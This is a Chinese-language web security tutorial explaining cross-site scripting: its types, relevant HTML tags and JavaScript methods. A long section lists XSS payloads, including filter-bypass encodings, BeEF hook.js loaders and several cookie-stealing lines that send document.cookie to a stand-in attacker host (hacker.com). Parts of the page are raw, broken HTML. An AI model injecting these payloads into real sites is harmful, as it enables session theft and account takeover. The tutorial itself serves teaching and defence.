XSS跨站脚本攻击原理 - 《Web网络安全》

XSS简介
- 举例说明
XSS攻击的危害
原理解析
脚本类型
- HTML标签
  - </a></li><li><a class="toc-level-4" href="#dinjgw" level="4" title="<textarea>"><textarea></a></li><li><a class="toc-level-4" href="#ayeuo" level="4" title="<img>"><img></a></li><li><a class="toc-level-4" href="#50r8kd" level="4" title="<script>"><script></a></li></ul></li><li><a class="toc-level-3" href="#9zgbho" level="3" title="JavaScript方法">JavaScript方法</a></li></ul></li><li><a class="toc-level-2" href="#9w9d25" level="2" title="构造XSS脚本">构造XSS脚本</a><ul><li><a class="toc-level-3" href="#cfwqmi" level="3" title="弹窗提示">弹窗提示</a></li><li><a class="toc-level-3" href="#4bam9m" level="3" title="弹框警告并重定向">弹框警告并重定向</a></li><li><a class="toc-level-3" href="#ee6642" level="3" title="页面嵌套">页面嵌套</a></li><li><a class="toc-level-3" href="#8ro3cc" level="3" title="页面重定向">页面重定向</a></li><li><a class="toc-level-3" href="#djcu6s" level="3" title="访问恶意代码">访问恶意代码</a></li><li><a class="toc-level-3" href="#57hmc7" level="3" title="image 标签">image 标签</a></li><li><a class="toc-level-3" href="#bmrwyo" level="3" title="绕开有过滤的脚本">绕开有过滤的脚本</a></li><li><a class="toc-level-3" href="#f99e6f" level="3" title="收集用户 cookie">收集用户 cookie</a><ul>

由于Waf防火墙等原因，攻击服务器已经变得十分困难了，所以攻击者逐渐把目光聚焦在了客户端上。

XSS简介

跨站脚本（cross site script）为了避免与样式css混淆，所以简称为XSS。
XSS是一种经常出现在web应用中的计算机安全漏洞，也是web中最主流的攻击方式（占比40%）。

XSS是指恶意攻击者利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点，进而添加一些代码，嵌入到web页面中去。使别的用户访问都会执行相应的嵌入代码，从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。比如你提交的是一串JS代码。

举例说明

我在论坛上面正常发表评论，小明来访问网站，看到了我的评论，这就是正常的，没有XSS。
如果我提交了类似于<script>console.log(document.cookie)</script>的评论，然后小明访问了网站，这段脚本在小明的浏览器执行，我的脚本就可以任意操作小明的 cookie，而小明是不知道的，有了 cookie，我就可以跨域伪造他的登录信息，访问他的各种隐私了。

XSS攻击的危害

盗取各类用户帐号，如机器登录帐号、用户网银帐号、各类管理员帐号
控制企业数据，包括读取、篡改、添加、删除企业敏感数据的能力
盗窃企业重要的具有商业价值的资料
非法转账
强制发送电子邮件
网站挂马
控制受害者机器向其它网站发起攻击

原理解析

造成XSS的主要原因

过于信任客户端提交的数据！

反射型xss攻击（Reflected XSS）

又称为非持久性跨站点脚本攻击，它是最常见的类型的 XSS 。漏洞产生的原因是攻击者注入的数据反映在响应中。一个典型的非持久性 XSS 包含一个带 XSS 攻击向量的链接(即每次攻击需要用户的点击)。一般以搜索框的形式出现。

存储型XSS（Stored XSS)

又称为持久型跨站点脚本，它一般发生在 XSS 攻击向量(一般指XSS攻击代码)存储在网站数据库，当一个页面被用户打开的时候执行。每当用户打开浏览器，脚本执行。持久的XSS相比非持久性XSS攻击危害性更大, 因为每当用户打开页面，查看内容时脚本将自动执行。谷歌的orkut曾经就遭受到XSS攻击。

脚本类型

HTML标签

</h4><p>iframe 元素会创建包含另外一个文档的内联框架（即行内框架）。 </p> <p><a name="vmwDR"></a></p> <h4 id="dinjgw"><a name="dinjgw" class="reference-link"></a><span class="header-link octicon octicon-link"></span><textarea></h4><p><textarea> 标签定义多行的文本输入控件。 </p> <p><a name="LwXyU"></a></p> <h4 id="ayeuo"><a name="ayeuo" class="reference-link"></a><span class="header-link octicon octicon-link"></span><img></h4><p>img 元素向网页中嵌入一幅图像。 </p> <p><a name="wlshx"></a></p> <h4 id="50r8kd"><a name="50r8kd" class="reference-link"></a><span class="header-link octicon octicon-link"></span><script></h4><p><script> 标签用于定义客户端脚本，比如 JavaScript。 <br />script 元素既可以包含脚本语句，也可以通过 src 属性指向外部脚本文件。 <br />必需的 type 属性规定脚本的 MIME 类型。 <br />JavaScript 的常见应用时图像操作、表单验证以及动态内容更新。</p> <p><a name="Vg5j4"></a></p> <h3 id="9zgbho"><a name="9zgbho" class="reference-link"></a><span class="header-link octicon octicon-link"></span>JavaScript方法</h3><ul> <li>alert alert() 方法用于显示带有一条指定消息和一个确认按钮的警告框 </li><li>window.location window.location 对象用于获得当前页面的地址 (URL)，并把浏览器重定向到新的页面。 </li><li>location.href 返回当前显示的文档的完整 URL </li><li>onload 一张页面或一幅图像完成加载 </li><li>onsubmit 确认按钮被点击 </li><li>onerror 在加载文档或图像时发生错误 </li></ul> <p><a name="D9U2a"></a></p> <h2 id="9w9d25"><a name="9w9d25" class="reference-link"></a><span class="header-link octicon octicon-link"></span>构造XSS脚本</h2><hr> <p><a name="Xn8ar"></a></p> <h3 id="cfwqmi"><a name="cfwqmi" class="reference-link"></a><span class="header-link octicon octicon-link"></span>弹窗提示</h3><p>此脚本实现弹框提示，一般作为漏洞测试或者演示使用,类似 SQL 注入漏洞测试中的单引号’, 一旦此脚本能执行，也就意味着后端服务器没有对特殊字符做过滤<>/‘ 这样就可以证明，这个页面位置存在了 XSS 漏洞。 </p> <pre><code class="lang-javascript"><script>alert('xss')</script> <script>alert(document.cookie)</script> </code></pre> <p><a name="iVlDk"></a></p> <h3 id="4bam9m"><a name="4bam9m" class="reference-link"></a><span class="header-link octicon octicon-link"></span>弹框警告并重定向</h3><pre><code class="lang-javascript"><script>alert("请移步到我们的新站");location.href="http://www.baidu.com"</script> <script>alert('xss');location.href="http://xxx.xxx.xxx.xxx/mutillidae/robots.txt"</script> </code></pre> <p>这里结合了一些社工的思路，例如，通过网站内部私信的方式将其发给其他用户。如果其他用户点击并且相信了这个信息，则可能在另外的站点重新登录账户（克隆网站收集账户）。<br /> <a name="vAAa2"></a></p> <h3 id="ee6642"><a name="ee6642" class="reference-link"></a><span class="header-link octicon octicon-link"></span>页面嵌套</h3><pre><code class="lang-html"><iframe src=http://www.baidu.com width=300 height=300></iframe> <iframe src=http://www.baidu.com width=0 height=0 border=0></iframe> </code></pre> <p><a name="LwBCP"></a></p> <h3 id="8ro3cc"><a name="8ro3cc" class="reference-link"></a><span class="header-link octicon octicon-link"></span>页面重定向</h3><pre><code class="lang-javascript"><script>window.location="http://www.baidu.com"</script> <script>location.href="http://www.baidu.com"</script> </code></pre> <p><a name="TxtSJ"></a></p> <h3 id="djcu6s"><a name="djcu6s" class="reference-link"></a><span class="header-link octicon octicon-link"></span>访问恶意代码</h3><pre><code class="lang-javascript"><script src="http://www.baidu.com/xss.js"></script> <script src="http://BeEF_IP:3000/hook.js"></script> #结合BeEF收集用户的cookie </code></pre> <p><a name="jomsA"></a></p> <h3 id="57hmc7"><a name="57hmc7" class="reference-link"></a><span class="header-link octicon octicon-link"></span>image 标签</h3><pre><code class="lang-html"><img src="#" onerror=alert('xss')> <img src="javascript:alert('xss');"> <img src="http://BeEF_IP:3000/hook.js"></img> </code></pre> <p><a name="R42uL"></a></p> <h3 id="bmrwyo"><a name="bmrwyo" class="reference-link"></a><span class="header-link octicon octicon-link"></span>绕开有过滤的脚本</h3><pre><code class="lang-html"><ScrIpt>alert('xss')</SCRipt> //大小写混用 <a href="&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97; &#108;&#101;&#114;&#116 ;&#40;&#34;&#120;&#115;&#115;&#34;&#41;">Lion7yu</a> //字符编码采用URL、Base64等编码 </code></pre> <p><a name="jJEEe"></a></p> <h3 id="f99e6f"><a name="f99e6f" class="reference-link"></a><span class="header-link octicon octicon-link"></span>收集用户 cookie</h3><p>打开新窗口并且采用本地 cookie 访问目标网页，打开新窗口并且采用本地 cookie 访问目标网页。 </p> <pre><code class="lang-html"><script>window.open("http://www.hacker.com/cookie.php?cookie="+document.cookie)</script> <script>document.location="http://www.hacker.com/cookie.php?cookie="+document.cookie</script> <script>new Image().src="http://www.hacker.com/cookie.php?cookie="+document.cookie;</script> <img src="http://www.hacker.com/cookie.php?cookie='+document.cookie"></img> <iframe src="http://www.hacker.com/cookie.php?cookie='+document.cookie"></iframe> <script> new Image().src="http://www.hacker.com/cookie.php?cookie='+document.cookie"; img.width = 0; img.height = 0; </script> </code></pre>